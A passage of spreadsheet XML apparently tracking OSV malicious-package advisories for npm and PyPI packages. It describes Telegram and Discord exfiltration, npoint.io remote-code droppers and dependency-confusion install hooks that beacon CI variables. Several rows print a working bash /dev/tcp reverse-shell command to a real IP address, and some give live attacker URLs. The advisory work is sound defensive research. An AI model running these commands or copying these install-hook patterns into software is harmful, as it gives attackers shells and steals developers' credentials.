      </c>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3eadb25768efba4ff9dc9170a838f90f6572993195d37e526543fa956e65faa2)
index.js is the package main and unconditionally starts a backup loop at module top level. On require, BackupManager zips process.cwd() (excluding node_modules,.git, archives) via archiver and uploads the archive with Telegraf's sendDocument to a hardcoded Telegram bot token ('8837512876:AAHX...') and chat_id '7549282259' shipped in src/config.js. The loop repeats every 60 minutes, continuously exfiltrating the installer's project tree (including any.env files, credentials, and source code) to the attacker's Telegram chat. The package is named 'discord-players' with description 'idk' but ships a 'tg-backup' CLI; the README documents a user-configured TG_BOT_TOKEN via a setup wizard that writes.env, and bin/setup.js does write a.env, but config.js ignores process.env entirely and always uses the hardcoded token and chat_id — the env-configuration story is a cover for hardcoded exfiltration to the author's chat.
</t>
        </is>
      </c>
      <c r="S44" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16213</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16214</t>
        </is>
      </c>
      <c r="D45" s="5" t="inlineStr"/>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="inlineStr"/>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>npm:discord-resolvers</t>
        </is>
      </c>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6aa01ed90340a9458c2906ec74fd9277bb7d0e4da48ef09487639aa6c45e6791)
The package published as discord-resolvers is unrelated to Discord. On require, index.js invokes startBackupLoop() at top level, which recursively archives the /root directory on Linux (or the drive root, typically C:\, on Windows) into a ZIP and uploads it via the Telegram Bot API to a hardcoded chat controlled by the package author. The loop repeats every hour and all errors are silently swallowed. The exclude list (node_modules,.git,.cache, tmp) does not exclude credential-bearing paths such as ~/.ssh, ~/.aws, ~/.npmrc,.env files, browser profiles, or wallet stores, so SSH keys, cloud credentials, source code, and other secrets under the archived root are shipped off-host. The Telegram bot token (8296271388:AAH-...) and chatId (8851479019) ship in cleartext in config.json and are the transport mechanism for the exfiltration; the destination is not caller-configurable. The package.json description ("Cross-platform automated server backup tool with Telegram delivery") self-labels the behavior but the package name and the silent auto-execution on require make this a covert exfiltration payload rather than an opt-in backup tool.
</t>
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16214</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16215</t>
        </is>
      </c>
      <c r="D46" s="5" t="inlineStr"/>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="inlineStr"/>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>npm:engin1</t>
        </is>
      </c>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1e843727c643c5d966acaa66461f7e392813a4284cd8181b4bb9b24ddfb8447a)
The package's main entrypoint (index.js) invokes an initializer at top level that spawns loader.js as a detached background Node process on every require/import. loader.js issues an HTTPS GET to https://api.npoint.io/24c25d5f5fcbb0992a4f, base64-decodes the JSON `code` field, and passes the decoded string to `new Function(require, __dirname, __filename, module, exports,...)`, executing attacker-controlled JavaScript with full Node privileges as the installing user. The endpoint URL is stored in a variable named `API_KEY` to disguise its nature, and the manifest/README advertise a runtime/system-info utility with a `getRuntimeInfo()` API that does not exist in the shipped code. The api.npoint.io document is attacker-mutable, unauthenticated, and unpinned, so whoever controls that bin controls what runs on any host importing this package.
</t>
        </is>
      </c>
      <c r="S46" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16215</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16216</t>
        </is>
      </c>
      <c r="D47" s="5" t="inlineStr"/>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="inlineStr"/>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>npm:tetomood</t>
        </is>
      </c>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6c09686feb7c38e815ef9a615a6ceba2444029a34ea9d6bee8598a76bc8e8f92)
package.json declares both preinstall and postinstall scripts that invoke wget to POST the installer's current working directory ($(pwd)) and machine hostname ($(hostname)) to a hardcoded Discord webhook endpoint on discord.com at install time. The tarball ships only package.json (611 bytes); the declared main entry index.js is absent, so the package has no legitimate functionality — the lifecycle beacons are its sole purpose. Installing the package causes automatic host reconnaissance data to be sent to an author-controlled remote endpoint without consent.
</t>
        </is>
      </c>
      <c r="S47" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16216</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16217</t>
        </is>
      </c>
      <c r="D48" s="5" t="inlineStr"/>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="inlineStr"/>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>npm:tetotest</t>
        </is>
      </c>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b181542b0c55a472e316ca973cc5b1deaf31986645fd326903e8c31ab20acab6)
package.json declares preinstall and postinstall lifecycle scripts that invoke wget to POST the installer's shell-expanded working directory ($(pwd)) and machine hostname ($(hostname)) to a hardcoded Discord webhook at https://discord.com/api/webhooks/1413937656697720862/&lt;redacted&gt;. Both hooks fire automatically on `npm install` without user interaction. The package ships no library code or documented functionality — its sole effect is beaconing installer host identifiers to an attacker-controlled Discord endpoint.
</t>
        </is>
      </c>
      <c r="S48" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16217</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16219</t>
        </is>
      </c>
      <c r="D49" s="5" t="inlineStr"/>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="inlineStr"/>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>PyPI:licloud</t>
        </is>
      </c>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (5e2bddcfca980297be9856fbbc3eeab78253c51efe034bd92b9e8b52ed9aacc6)
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research &amp; co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
 - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="S49" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16219</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16220</t>
        </is>
      </c>
      <c r="D50" s="5" t="inlineStr"/>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="inlineStr"/>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>npm:jexkcode</t>
        </is>
      </c>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>Versions 1.0.1 through 1.1.4 of jexkcode automatically follow a hard-coded WhatsApp newsletter whenever a WhatsApp connection opens. The package waits three seconds and calls newsletterFollow without obtaining user consent or exposing a configuration option. The README advertises newsletter support but does not disclose this automatic account modification. Versions through 1.1.1 used a malformed newsletter JID; version 1.1.2 corrected it. Subsequent commits removed both failure and success logs, so version 1.1.4 performs the automatic follow without visible output. This behavior is unrelated to the package's stated functionality and modifies the user's WhatsApp account without authorization.</t>
        </is>
      </c>
      <c r="S50" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16220</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16222</t>
        </is>
      </c>
      <c r="D51" s="5" t="inlineStr"/>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="inlineStr"/>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>npm:@traktis/core</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (45eb01f2eb09b73c0660d97e76d37ab8f7d62773cab9cdbdea65039a37dbb534)
package.json declares preinstall and postinstall lifecycle scripts that run curl against http://tko.amgsec.com/depconf/traktis-core/ on every `npm install`, carrying the output of whoami, hostname, and PWD as query parameters together with a base64-encoded dump of CI-related environment variables (GITHUB_*, CI_PROJECT, JENKINS_URL, BUILD_URL, GITLAB_*, RUNNER_*, HOSTNAME, USER, HOME). index.js is a one-line placeholder with no functionality, so the manifest is the entire payload. The scoped name combined with version 99.99.2 is the shape used to win dependency resolution against an internal package of the same name, causing internal build systems to install this artifact and beacon their identity and CI/repo metadata to a hardcoded non-publisher endpoint over plaintext HTTP.
</t>
        </is>
      </c>
      <c r="S51" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16222</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16223</t>
        </is>
      </c>
      <c r="D52" s="5" t="inlineStr"/>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="inlineStr"/>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>npm:@traktis/environment</t>
        </is>
      </c>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6b9bdabc95f4e8bc70e348557c1cae7d2447d9bd1405ac7a23945ded47ec04a8)
package.json declares preinstall and postinstall lifecycle scripts that invoke curl against the hardcoded cleartext endpoint http://tko.amgsec.com/depconf/traktis-environment/, sending the output of whoami, hostname, cwd, a timestamp, and a base64-encoded dump of CI/build environment variables matched by the pattern GITHUB_*, CI_PROJECT, JENKINS_URL, BUILD_URL, GITLAB_*, RUNNER_*, HOSTNAME, USER, HOME as query parameters. index.js is a 55-byte placeholder comment and author is listed as 'anonymous'; the manifest lifecycle scripts are the entire functional payload. The name occupies the @traktis scope at version 99.99.2, a version-inflation shape consistent with dependency-confusion resolution against an internal package of the same name. Installing the package on any developer workstation or CI runner automatically transmits build-system identity and any credential-shaped environment variables covered by the grep pattern to a third-party host over plain HTTP.
</t>
        </is>
      </c>
      <c r="S52" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16223</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16224</t>
        </is>
      </c>
      <c r="D53" s="5" t="inlineStr"/>
      <c r="E53" s="5" t="inlineStr"/>
      <c r="F53" s="5" t="inlineStr"/>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>npm:process-mite</t>
        </is>
      </c>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">This package is part of a malicious npm campaign published by the `max233` account. Importing the package automatically launches a detached JavaScript loader that retrieves and executes additional code from npoint.io. The retrieved payload communicates with an attacker-controlled server and implements clipboard collection, keyboard and mouse event collection, filesystem scanning, and theft of Chrome extension storage.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4763fac30373bc805351d0eb8e0989cde9dcd2ab2c1b18f9eb7bde4e61765191)
On import of the package main, index.js auto-invokes an initialize() routine that spawns a detached `node loader.js` process. loader.js performs an HTTPS GET against the hardcoded endpoint https://api.npoint.io/33e8d008c334b060adad, base64-decodes the `code` field of the returned JSON, and executes the decoded string via `new Function("require","__dirname","__filename","module","exports", decodedCode)(...)`, granting the fetched payload full Node.js capabilities on the installer's host. npoint.io is a user-editable JSON hosting service, so the executed code is mutable by whoever controls the note and is unpinned and unverified. package.json and README present the package as a 'runtime-utils' library exporting getRuntimeInfo, but no such API is shipped; the advertised purpose is a cover story for the dropper. In-source comments self-describe the module as an embedded remote-code-execution client.
</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16224</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16225</t>
        </is>
      </c>
      <c r="D54" s="5" t="inlineStr"/>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="inlineStr"/>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-cccon-meeb</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b6c0ca5cf1881ed03c4a8b91832bcd8f65854bd36d9b764843370d26f599c2a0)
postinstall.js runs automatically on `npm install` and executes a bash reverse shell to the hardcoded remote host 14.225.210.85:80 via `/dev/tcp`, granting that host interactive command execution on the installing machine. Execution is gated by `os.hostname() === 'ubuntu-fc-uvm'`: on non-matching hosts the script exits silently, while on the targeted hostname it spawns `bash -i &gt;&amp; /dev/tcp/14.225.210.85/80 0&gt;&amp;1`. The hostname allowlist is a detonation guard that keeps the payload dormant on generic scanners and typical developer machines while firing on the intended target. The package is presented as a Strapi plugin but ships no plugin functionality relevant to this behavior in the postinstall path; the lifecycle script's sole effect is the reverse-shell attempt.
</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16225</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16226</t>
        </is>
      </c>
      <c r="D55" s="5" t="inlineStr"/>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="inlineStr"/>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-ccip-meeb</t>
        </is>
      </c>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr"/>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fbf7a24da69c80ba7475efcb12c97f1be8b4ebbed42b47131ac9716ff38d5620)
strapi-plugin-ccip-meeb@3.6.8 declares scripts.postinstall = 'node postinstall.js', so postinstall.js runs automatically on npm install. The script imports child_process and checks os.hostname() against a hardcoded value ('ubuntu-fc-uvm'); when the hostname matches, it executes `bash -c "bash -i &gt;&amp; /dev/tcp/14.225.210.85/80 0&gt;&amp;1"`, opening an interactive reverse shell from the installer's host to 14.225.210.85:80. The hostname gate causes the payload to remain dormant on unrelated hosts and fire only in the attacker's expected target environment, a targeting/sandbox-evasion pattern. The package name mimics a legitimate Strapi plugin scope but the shipped code has no plugin functionality consistent with that name; the postinstall reverse shell is the substantive behavior.
</t>
        </is>
      </c>
      <c r="S55" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16226</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16227</t>
        </is>
      </c>
      <c r="D56" s="5" t="inlineStr"/>
      <c r="E56" s="5" t="inlineStr"/>
      <c r="F56" s="5" t="inlineStr"/>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-ccrec-meeb</t>
        </is>
      </c>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr"/>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (27dd1178f43debcd9babc6630aa303b6953e7572d994f8efe3acc75db2cc878e)
The package's postinstall lifecycle script (postinstall.js) executes a bash /dev/tcp reverse shell to the hardcoded remote endpoint 14.225.210.85:80, giving the operator of that host an interactive shell on the installer's machine. Execution is gated by an os.hostname() equality check against 'ubuntu-fc-uvm'; on a matching host the script retries the connection up to 5 times, and on any other host it exits silently. The hostname gate is an evasion mechanism that hides the payload from generic installers and sandboxes while enabling targeted exploitation. The behavior fires automatically on npm install via scripts.postinstall with no user interaction. The package name mimics a Strapi plugin but ships no plugin functionality consistent with the declared purpose.
</t>
        </is>
      </c>
      <c r="S56" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16227</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16228</t>
        </is>
      </c>
      <c r="D57" s="5" t="inlineStr"/>
      <c r="E57" s="5" t="inlineStr"/>
      <c r="F57" s="5" t="inlineStr"/>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-ccrev-meeb</t>
        </is>
      </c>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr"/>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cbcdfb404042de180795640d5ea266d8fe50afff5d180b3da0eab17f979369f3)
postinstall.js executes automatically on `npm install` and opens a bash reverse shell via /dev/tcp redirection to the hardcoded remote endpoint 14.225.210.85:80, retrying up to 5 times. Execution is gated by an os.hostname() check against 'ubuntu-fc-uvm', so the payload only fires on installers whose hostname matches that value; on matching hosts the attacker obtains an interactive shell on the installer's machine. The package name mimics an unrelated Strapi plugin, and no legitimate plugin functionality is present alongside the postinstall payload.
</t>
        </is>
      </c>
      <c r="S57" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16228</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16229</t>
        </is>
      </c>
      <c r="D58" s="5" t="inlineStr"/>
      <c r="E58" s="5" t="inlineStr"/>
      <c r="F58" s="5" t="inlineStr"/>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-conresh-meeb</t>
        </is>
      </c>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr"/>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d117fca143f7c8f02261755b923b29cae47f8fdcca2f69f169e26a5601b3661a)
